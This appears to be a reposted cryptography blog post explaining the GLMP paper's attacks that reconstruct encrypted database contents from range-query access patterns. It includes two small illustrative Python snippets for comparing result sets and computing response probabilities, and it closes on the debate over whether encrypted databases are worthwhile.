They could also try to do things perfectly using expensive techniques like fully-homomorphic encryption and oblivious RAM — but the results would be highly inefficient. So a common view in the field is researchers should do the very best we can, and then carefully explain to users what the risks are. For example, a real database system might provide the following guarantee: “Records are opaque. If the user queries for all records BETWEEN some hidden values X AND Y then all the database will learn is the row numbers of the records that match this range, and nothing else.” This is a pretty awesome guarantee, particularly if you can formalize it and prove that a scheme achieves it. And indeed, this is something that researchers have tried to do. The formalized description is typically achieved by defining something called a leakage function. It might not be possible to prove that a scheme is absolutely private, but we can prove that it only leaks as much as the leakage function allows. Now, I may be overdoing this slightly, but I want to be very clear about this next part: Proving your encrypted database protocol is secure with respect to a specific leakage function does not mean it is safe to use in practice. What it means is that you are punting that question to the application developer, who is presumed to know how this leakage will affect their dataset and their security needs. Your leakage function and proof simply tell the app developer what information your scheme is (provably) going to protect, and what it won’t. The obvious problem with this approach is that application developers probably don’t have any idea what’s safe to use either. Helping them to figure this out is one goal of this new GLMP paper and its related work. So what leaks from these schemes? GLMP don’t look at a specific encryption scheme. 
Rather, they ask a more general question: let’s imagine that we can only see that a legitimate user has made a range query — but not what the actual queried range values are. Further, let’s assume we can also see which records the database returns for that query, but not their actual values. How much does just this information tell us about the contents of the database? You can see that this is a very limited amount of leakage. Indeed, it is possibly the least amount of leakage you could imagine for any system that supports range queries, and is also efficient. So in one sense, you could say the authors are asking a different and much more important question: are any of these encrypted databases actually secure? The answer is somewhat worrying.
Can you give me a simple, illuminating example?
Let’s say I’m an attacker who has compromised a database, and observes the following two range queries/results from a legitimate client:
Query 1: SELECT * FROM Salaries BETWEEN [emoji] and [emoji]
Result 1: (rows 1, 3, 5)
Query 2: SELECT * FROM Salaries BETWEEN [emoji] and [emoji]
Result 2: (rows 1, 43, 3, 5)
Here I’m using the emoji to illustrate that an attacker can’t see the actual values submitted within the range queries — those are protected by the scheme — nor can she see the actual values of the result rows, since the fancy encryption scheme hides all this stuff. All the attacker sees is that a range query came in, and some specific rows were scooped up off disk after running the fancy search protocol. So what can the attacker learn from the above queries? Surprisingly: quite a bit. At the very minimum, the attacker learns that Query 2 returned all of the same records as Query 1. Thus the range of the latter query clearly somewhat overlaps with the range of the former. There is an additional record (row 43) that is not within the range of Query 1. That tells us that row 43 must be either the “next” greater or smaller record than each of rows (1, 3, 5). That’s useful information.
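The comparison an attacker performs on those two results can be sketched in a few lines of Python. This is only an illustration of the reasoning above: `compare_results` is a hypothetical helper, and the row numbers are the ones from the example.

```python
def compare_results(first, second):
    """Compare the row numbers returned by two observed range queries."""
    a, b = set(first), set(second)
    return {
        "shared": sorted(a & b),          # rows returned by both queries
        "only_first": sorted(a - b),      # rows seen only in the first result
        "only_second": sorted(b - a),     # rows seen only in the second result
        "first_within_second": a <= b,    # True if query 2 covers query 1's rows
    }


result_1 = [1, 3, 5]
result_2 = [1, 43, 3, 5]
observation = compare_results(result_1, result_2)

if __name__ == "__main__":
    print(observation)
```

Because a range query returns a contiguous run of values, a row that appears only in the wider result (row 43 here) has to sit just outside the run formed by the shared rows, on one side or the other.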
Get enough useful information, and it turns out that it starts to add up. In 2016, Kellaris, Kollios, Nissim and O’Neill showed that if you know the distribution of the query range endpoints — for example, if you assumed that they were uniformly random — then you can get more than just the order of records. You can reconstruct the exact value of every record in the database. This result is statistical in nature. If I know that the queries are uniformly random, then I can model how often a given value (say, Age=34 out of a range 1-120) should be responsive to a given random query. By counting the actual occurrences of a specific row after many such queries, I can guess which rows correlate to specific record values. The more queries I see, the more certain I can be. The Kellaris et al. paper shows that this takes O(N^4 log N) queries, where N is the number of possible values your data can take on (e.g., the ages of your employees, ranging between 1 and 100 would give N=100.) This is assuming an arbitrary dataset. The results get much better if the database is “dense”, meaning every possible value occurs once. In practice the Kellaris et al. results mean that database fields with small domains (like ages) could be quickly reconstructed after observing a reasonable number of queries from a legitimate user, albeit one who likes to query everything randomly. So that’s really bad! The main bright spot in this research — at least up until recently — was that many types of data have much larger domains. If you’re dealing with salary data ranging from, say, $1 to $200,000, then N=200,000 and this dominant N^4 term tends to make Kellaris et al. attacks impractical, simply because they’ll take too long. Similarly, data like employee last names (encoded in a form that can be sorted and range-queried) gives you even vaster domains, and so perhaps we could pleasantly ignore these results and spend our time on more amusing engagements.
I bet we can’t ignore these results, can we?
Indeed, it seems that we can’t. The reason we can’t sit on our laurels and hope for an attacker to die of old age recovering large-domain data sets is due to something called approximate database reconstruction, or ADR. The setting here is the same: an attacker sits and watches a legitimate user make (uniformly random) range queries. The critical difference is that this attacker isn’t trying to get every database record back at its exact value: she’s willing to tolerate some degree of error, up to an additive error set by a parameter ε. For example, if I’m trying to recover employee salaries, I don’t need them to be exact: getting them within 1% or 5% is probably good enough for my purposes. Similarly, reconstructing nearly all of the letters in your last name probably lets me guess the rest, especially if I know the distribution of common last names. Which finally brings us to this new GLMP paper, which puts ADR on steroids. What it shows is that in the same setting, if one is willing to “sacrifice” a few of the highest and lowest values in the database, an attacker can reconstruct nearly the full database in a much smaller (asymptotic) number of queries, one that depends only on ε, the error parameter. The important thing to notice about these results is that the value N has dropped out of the equation. The only term that’s left is the error term ε. That means these results are “scale-free”, and (asymptotically, at least), they work just as well for small values of N as large ones, and large databases and small ones. This is really remarkable.
Big-O notation doesn’t do anything for me: what does this even mean?
Big-O notation is beloved by computer scientists, but potentially meaningless in practice. There could be huge constants in these terms that render these attacks completely impractical. Besides, weird equations involving epsilon characters are impossible for humans to understand.
Sometimes the easiest way to understand a theoretical result is to plug some actual numbers in and see what happens. GLMP were kind enough to do this for us, by first generating several random databases — each containing 1,000 records, for different values of N. They then ran their recovery algorithm against a simulated batch of random range queries to see what the actual error rate looked like as the query count increased. Here are their results: Experimental results (Figure 2) from Grubbs et al. (GLMP, 2019). The Y-axis represents the measured error between the reconstructed database and the actual dataset (smaller is better.) The X-axis represents the number of queries. Each database contains 1,000 records, but there are four different values of N tested here. Notice that the biggest error occurs around the very largest and smallest values in the dataset, so the results are much better if one is willing to “sacrifice” these values. Even after just 100 queries, the error in the dataset has been hugely reduced, and after 500 queries the contents of the database — excluding the tails — can be recovered with only about a 1-2% error rate. Moreover, these experimental results illustrate the fact that recovery works at many scales: that is, they work nearly as well for very different values of N, ranging from 100 to 100,000. This means that the only variable you really need to think about as an attacker is: how close do I need my reconstruction to be? This is probably not very good news for any real data set. How do these techniques actually work? The answer is both very straightforward and deeply complex. The straightforward part is simple; the complex part requires an understanding of Vapnik-Chervonenkis learning theory (VC-theory) which is beyond the scope of this blog post, but is explained in the paper. At the very highest level the recovery approach is similar to what’s been done in the past: using response probabilities to obtain record values. 
This paper does it much more efficiently and approximately, using some fancy learning theory results while making a few assumptions. At the highest level: we are going to assume that the range queries are made on random endpoints ranging from 1 to N. This is a big assumption, and more on it later! Yet with just this knowledge in hand, we learn quite a bit. For example: we can compute the probability that a potential record value (say, the specific salary $34,234) is going to be sent back, provided we know that all values lie in the range 1-N (say, we know all salaries are between $1 and $200,000). If we draw the resulting probability curve in freehand, it might look something like the chart below. This isn’t actually to scale or (probably) even accurate, but it illustrates a key point: by the nature of (random) range queries, records near the center are going to have a higher overall chance of being responsive to any given query, since the “center” values are more frequently covered by random ranges, and records near the extreme high and low values will be chosen less frequently. I drew this graph freehand to mimic a picture in Kenny’s slides. Not a real plot! The high-level goal of database reconstruction is to match the observed response rate for a given row (say, row 41) to the number of responses we’d expect to see for different specific concrete values in the range. Clearly the accuracy of this approach is going to depend on the number of queries you, the attacker, can observe — more is better. And since the response rates are lower at the highest and lowest values, it will take more queries to guess outlying data values. You might also notice that there is one major pitfall here. Since the graph above is symmetric around its midpoint, the expected response rate will be the same for a record at .25*N and a record at .75*N — that is, a $50,000 salary will be responsive to random queries at precisely the same rate as a $150,000 salary.
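To make the shape of that curve concrete, here is a small sketch. It assumes one particular model of “random” range queries, namely that every range [a, b] with 1 <= a <= b <= N is equally likely; the function names are made up for this illustration and are not taken from the GLMP paper.

```python
from fractions import Fraction


def response_probability(v: int, n: int) -> Fraction:
    """Chance that a uniformly chosen range [a, b] within 1..n contains v.

    There are v choices for a (1..v) and n + 1 - v choices for b (v..n),
    out of n * (n + 1) / 2 possible ranges in total.
    """
    return Fraction(2 * v * (n + 1 - v), n * (n + 1))


def candidate_values(observed_rate: Fraction, n: int):
    """Best-matching value in the lower half of the domain, plus its mirror."""
    lower_half = range(1, (n + 1) // 2 + 1)
    best = min(lower_half,
               key=lambda v: abs(response_probability(v, n) - observed_rate))
    return best, n + 1 - best


if __name__ == "__main__":
    n = 100
    print(response_probability(1, n), response_probability(50, n))
    print(candidate_values(response_probability(30, n), n))
```

Under this model the curve is symmetric around (N + 1) / 2, so an observed response rate maps back to a value and its mirror image rather than to a single value.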
So even if you get every database row pegged precisely to its response rate, your results might still be “flipped” horizontally around the midpoint. Usually this isn’t the end of the world, because databases aren’t normally full of unstructured random data — high salaries will be less common than low salaries in most organizations, for example, so you can probably figure out the ordering based on that assumption. But this last “bit” of information is technically not guaranteed to come back, minus some assumptions about the data set. Thus, the recovery algorithm breaks down into two steps: first, observe the response rate for each record as random range queries arrive. For each record that responds to such a query, try to solve for a concrete value that minimizes the difference between the expected response rate on that value, and the observed rate. The probability estimation can be made more efficient (eliminating a quadratic term) by assuming that there is at least one record in the database within the range .2N-.3N (or .7N-.8N, due to symmetry). Using this “anchor” record requires a mild assumption about the database contents. What remains is to show that the resulting attack is efficient. You can do this by simply implementing it — as illustrated by the charts above. Or you can prove that it’s efficient. The GLMP paper uses some very heavy statistical machinery to do the latter. Specifically, they make use of a result from Vapnik-Chervonenkis learning theory (VC-theory), which shows that the bound can be derived from something called the VC-dimension (which is a small number, in this case) and is unrelated to the actual value of N. That proof forms the bulk of the result, but the empirical results are also pretty good. Is there anything else in the paper? Yes. It gets worse. There’s so much in this paper that I cannot possibly include it all here without risking carpal tunnel and boredom, and all of it is bad news for the field of encrypted databases. 
The biggest additional result is one that shows that if all you want is an approximate ordering of the database rows, then you can do this efficiently using something called a PQ tree. Asymptotically, this requires queries, and experimentally the results are again even better than one would expect.

What’s even more important about this ordering result is that it works independently of the query distribution. That is: we do not need to have random range queries in order for this to work: it works reasonably well regardless of how the client puts its queries together (up to a point).

Even better, the authors show that this ordering, along with some knowledge of the underlying database distribution (for example, let’s say we know that it consists of U.S. citizen last names), can also be used to obtain approximate database reconstruction. Oy vey!

And there’s still even more:

The authors show how to obtain even more efficient database recovery in a setting where the query range values are known to the attacker, using PAC learning. This is a more generous setting than previous work, but it could be realistic in some cases.

Finally, they extend this result to prefix and suffix queries, as well as range queries, and show that they can run their attacks on a dataset from the Fraternal Order of Police, obtaining record recovery in a few hundred queries.

In short: this is all really bad for the field of encrypted databases.

So what do we do about this?

I don’t know. Ignore these results? Fake our own deaths and move into a submarine?

In all seriousness: database encryption has been a controversial subject in our field. I wish I could say that there’s been an actual debate, but it’s more that different researchers have fallen into different camps, and nobody has really had the data to make their position in a compelling way. There have actually been some very personal arguments made about it.
The schools of thought are as follows:

The first holds that any kind of database encryption is better than storing records in plaintext and we should stop demanding things be perfect, when the alternative is a world of constant data breaches and sadness. To me this is a supportable position, given that the current attack model for plaintext databases is something like “copy the database files, or just run a local SELECT * query”, and the threat model for an encrypted database is “gain persistence on the server and run sophisticated statistical attacks.” Most attackers are pretty lazy, so even a weak system is probably better than nothing.

The countervailing school of thought has two points: sometimes the good is much worse than the perfect, particularly if it gives application developers an outsized degree of confidence in the security that their encryption system is going to provide them. If even the best encryption protocol is only throwing a tiny roadblock in the attacker’s way, why risk this at all? Just let the database community come up with some kind of ROT13 encryption that everyone knows to be crap and stop throwing good research time into a problem that has no good solution.

I don’t really know who is right in this debate. I’m just glad to see we’re getting closer to having it.

Source: https://blog.cryptographyengineering.com/2019/02/11/attack-of-the-week-searchable-encryption-and-the-ever-expanding-leakage-function/